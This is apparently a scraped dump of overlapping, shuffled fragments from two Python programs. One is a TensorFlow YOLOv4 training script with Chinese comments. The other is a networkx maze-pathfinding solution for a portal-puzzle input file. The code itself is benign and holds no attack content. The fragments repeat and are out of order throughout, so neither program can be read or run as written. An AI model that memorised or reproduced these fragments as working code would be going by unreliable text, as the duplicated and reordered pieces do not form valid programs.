device,convert to use cpu\") else: logging.info(\"use cpu device\") #", "tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients,", "{:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch %", "= self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if", "in train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch =", "# -*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author :", "= YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self):", "1, train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step +=", "step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0:", "0 for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data,", "from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() #", "# gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\"", "if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配 for", "gpu device,convert to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] =", "= 
process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss", "logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu", "image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch)", "init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标", "for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found", "/ batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path +", "fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else:", "%Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写,", "+ \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo =", "filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data", "txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net", "net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(", "# ============================================ import logging import tensorflow as tf import os from src.yolo4.config import", "= generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out)", "@Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================ import", "net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count /", "== 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ ==", "staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return", "Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data:", "device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] =", "# 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构", "= loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step:", "logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class 
BaseModel(object):", "_ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def", "是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch =", "1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape()", "metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if", "import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import", "-*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email :", "%(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: '''", "= tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data: count += 1 train_data", "epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss", "label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch,", "PyCharm # ============================================ import logging import tensorflow as tf import os from src.yolo4.config", "train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency ==", "%d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self):", "def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True)", "count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS()", "net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss", "os from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET", "{} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数", "weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss =", "optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return", "print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer =", "= tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus", "= \"-1\" logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use cpu device\")", "+= 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET()", "+= 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with", "tf import os from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net", "YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule", ": xiao9616 # @Email : <EMAIL> # 
@File : BaseModel.py # @Software: PyCharm", "def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)", "{}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if", "save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__", "gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not", "from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a,", "as tf import os from src.yolo4.config import * from src.yolo4.util import * from", "return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule =", "return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU", "0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes =", "as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables)", "# @Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================", "step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes)", "def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001,", "\"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo = BaseModel()", "# ============================================= # -*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 #", "''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0", "optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置", "logging.info(\"use gpu device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else:", "fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() #", "模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch", "metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step", "logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count =", "= tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch,", "@Author : xiao9616 # @Email : <EMAIL> # @File : BaseModel.py # @Software:", "@File : BaseModel.py # @Software: PyCharm # 
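    # -----------------------------------------------------------------------
    # Illustrative aside (not part of the original file): with staircase=True
    # the schedule above multiplies the rate by 0.96 once per completed
    # 3000-step window, i.e. lr(step) = 0.001 * 0.96 ** (step // 3000).
    # A minimal check, assuming TF 2.x semantics, that can be pasted into a
    # REPL:
    #
    #     lr = tf.keras.optimizers.schedules.ExponentialDecay(
    #         initial_learning_rate=0.001, decay_steps=3000,
    #         decay_rate=0.96, staircase=True)
    #     assert abs(float(lr(2999)) - 0.001) < 1e-9          # still window 0
    #     assert abs(float(lr(3000)) - 0.001 * 0.96) < 1e-9   # window 1
    # -----------------------------------------------------------------------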
    def metric_generator(self):
        metric = tf.keras.metrics.Mean()
        return metric

    def train(self):
        # GPU setup
        tf.debugging.set_log_device_placement(True)
        if use_gpu:
            gpus = tf.config.experimental.list_physical_devices(device_type="GPU")
            if gpus:
                logging.info("use gpu device")
                # grow GPU memory on demand instead of reserving it all upfront
                for gpu in gpus:
                    tf.config.experimental.set_memory_growth(device=gpu, enable=True)
                    tf.print(gpu)
            else:
                os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
                logging.info("no GPU device found, falling back to CPU")
        else:
            logging.info("use cpu device")
            # disable the GPU
            os.environ["CUDA_VISIBLE_DEVICES"] = "-1"

        # training data
        train_dataset, train_count = self.data_generator()
        # network architecture
        net = self.net_generator()
        net.summary()
        global fine_tune_epoch
        # resume from a saved checkpoint when fine-tuning
        if fine_tune:
            net.load_weights(filepath=weights_path + "epoch-{}".format(fine_tune_epoch))
            print("loaded weights from epoch {}".format(fine_tune_epoch))
        else:
            fine_tune_epoch = -1
            print("train model from init")
        # loss function
        loss = self.loss_generator()
        # optimizer
        optimizer = self.optimizer_generator()
        # evaluation metric
        metric = self.metric_generator()
        # training loop: forward pass, loss, gradient update per batch
        for epoch in range(fine_tune_epoch + 1, train_epochs):
            step = 0
            for train_dataset_batch in train_dataset:
                # print(train_dataset_batch)
                step += 1
                images, boxes = parse_dataset_batch(dataset=train_dataset_batch)
                image_batch = process_image_batch(images)
                label_batch = generate_label_batch(boxes)
                with tf.GradientTape() as tape:
                    out = net(image_batch)
                    total_loss = loss(y_true=label_batch, y_pred=out)
                gradients = tape.gradient(total_loss, net.trainable_variables)
                optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables))
                metric.update_state(values=total_loss)
                print("Epoch: {}/{}, step: {}/{}, loss: {:.5f}".format(
                    epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()
                ))
            metric.reset_states()
            if epoch % save_frequency == 0:
                net.save_weights(filepath=weights_path + "epoch-{}".format(epoch), save_format='tf')
        net.save_weights(filepath=weights_path + "epoch-{}".format(train_epochs), save_format='tf')


if __name__ == '__main__':
    yolo = BaseModel()
    yolo.train()
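# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the original module): the class
# docstring says BaseModel is meant to be subclassed with its factory methods
# overridden. A minimal example, assuming a hypothetical "my_train.txt"
# annotation list and the same config globals (batch_size, etc.):
#
#     class MyModel(BaseModel):
#         def data_generator(self):
#             # must keep the (dataset, sample_count) contract of the base class
#             txt_data = tf.data.TextLineDataset(filenames="my_train.txt")
#             count = sum(1 for _ in txt_data)
#             return txt_data.batch(batch_size=batch_size), count
#
#     MyModel().train()
# ---------------------------------------------------------------------------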
[ "0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer:", "import networkx as nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines):", "0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level:", "{} for portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in", "- 1) if lines[row - 1][col] == '.' else (col, row + 2))", "= nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return", "= direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part", "for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world,", "portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer", "pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level", "y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {},", "level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) paths = [path", "- 1) def is_outer(x, y): return x == 2 or y == 2", "not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col +", "= nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id", "1][col]].append((col, row - 1) if lines[row - 1][col] == '.' else (col, row", "else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and", "else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row +", "in enumerate(line): if obj != '.': continue if line[col - 1] == '.':", "= [path for path in paths if path] return min(paths) if paths else", "in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col +", "path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0", "if level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions)", "== 2 or x == width - 4 or y == height -", "pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = []", "def is_outer(x, y): return x == 2 or y == 2 or x", "pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos)", "assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines()", "from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in", "= dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos):", "- 4 or y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer,", "for row,line in enumerate(lines): for col,obj in enumerate(line): if obj != '.': continue", "W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0])", "return 
acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if", "+ 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if line[col +", "portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with", "continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else", "min(solutions) if solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections,", "None) paths = [path for path in paths if path] return min(paths) if", "current_pos): return [pos for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos,", "[(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop()", "+ 2] == '.' else (col - 1, row)) elif lines[row + 1][col].isalpha():", "direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections, 100)", "= get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions", "'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst", "row - 1)) return world def search_portals(lines): portals = defaultdict(list) for row,line in", "[pos for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list,", "portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1: continue assert len(portals)", "portals[obj + line[col + 1]].append((col + 2, row) if line[col + 2] ==", "> 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions", "0)] solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner", "if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos:", "== width - 4 or y == height - 3 def accessible_portals(pos, portal_list,", "'.': world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col] == '.':", "len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width", "new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)]", "level - 1, path_length) return min(solutions) if solutions else None W = direct_paths(lines)", "== 2 or y == 2 or x == width - 4 or", "'.': world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines): portals =", "dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert", "- 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id", "- 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row", "is_outer(x, y): return x == 2 or y == 2 or x ==", "2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) ==", "+ 1]].append((col + 2, row) if line[col + 2] == '.' 
else (col", "get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos != current_pos][0]", "world): for portals in portal_list.values(): if len(portals) == 1: continue assert len(portals) ==", "continue if line[col - 1] == '.': world.add_edge((col, row), (col - 1, row))", "portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not", "acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions else None W", "for pid in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length =", "or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level", "height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for", "nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos", "in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos", "nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if obj != '.':", "distance_to_goal else None) paths = [path for path in paths if path] return", "portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return x == 2", "for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if", "search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items(): if pid ==", "= defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha():", "line[col - 1] == '.': world.add_edge((col, row), (col - 1, row)) if lines[row", "world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines): portals = defaultdict(list)", "if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col", "and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found", "accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal", "'ZZ']: current = accessible[pid] new_length = current_length + 1 + current[0] new_pos =", "def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in [pid for", "for col,obj in enumerate(line): if obj != '.': continue if line[col - 1]", "portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos", "new_level, current_length): for pid in [pid for pid in accessible.keys() if pid !=", "acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level +", "!= '.': continue if line[col - 1] == '.': world.add_edge((col, row), (col -", "nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph()", "'.' 
else (col, row + 2)) return portals def portal_paths(portal_list, world): for portals", "world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None)", "networkx as nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world", "enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col +", "line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if line[col", "elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if level >", "if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos", "paths = [] for pid, dst_pos in accessible.items(): if pid == 'ZZ' or", "return world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj", "row), (col - 1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row),", "path in paths if path] return min(paths) if paths else None acc_outer, acc_inner", "search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level):", "col,obj in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj +", "acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if", "in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world,", "level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0", "1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in [pid", "+ line[col + 1]].append((col + 2, row) if line[col + 2] == '.'", "2, row) if line[col + 2] == '.' 
else (col - 1, row))", "= to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and", "continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row)", "in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer,", "dlevel): paths = [] for pid, dst_pos in accessible.items(): if pid == 'ZZ'", "continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1],", "portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] ==", "else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result", "if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level ==", "0, 0)] solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer,", "+ dst_pos[0] + 1 if distance_to_goal else None) paths = [path for path", "row + 2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values(): if", "'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]),", "paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) paths = [path for", "'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner,", "return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length):", "== 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width =", "in portal_list[portal_id]: if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos)", "search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1)", "continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst =", "(col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col,", "solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1,", "in portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1])", "obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2,", "x == 2 or y == 2 or x == width - 4", "one', len(path) - 1) def is_outer(x, y): return x == 2 or y", "= len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W)", "= search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) -", "if line[col + 2] == '.' 
else (col - 1, row)) elif lines[row", "height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path =", "accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length +", "+ dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if", "min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level", "1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row -", "pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0]", "acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass", "len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as", "portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos != current_pos][0] def", "pid in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length = current_length", "1)) return world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for", "!= 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return", "x == width - 4 or y == height - 3 def accessible_portals(pos,", "if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible,", "in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue", "solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner =", "pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = [] for", "for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj", "pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history):", "row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col", "dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) 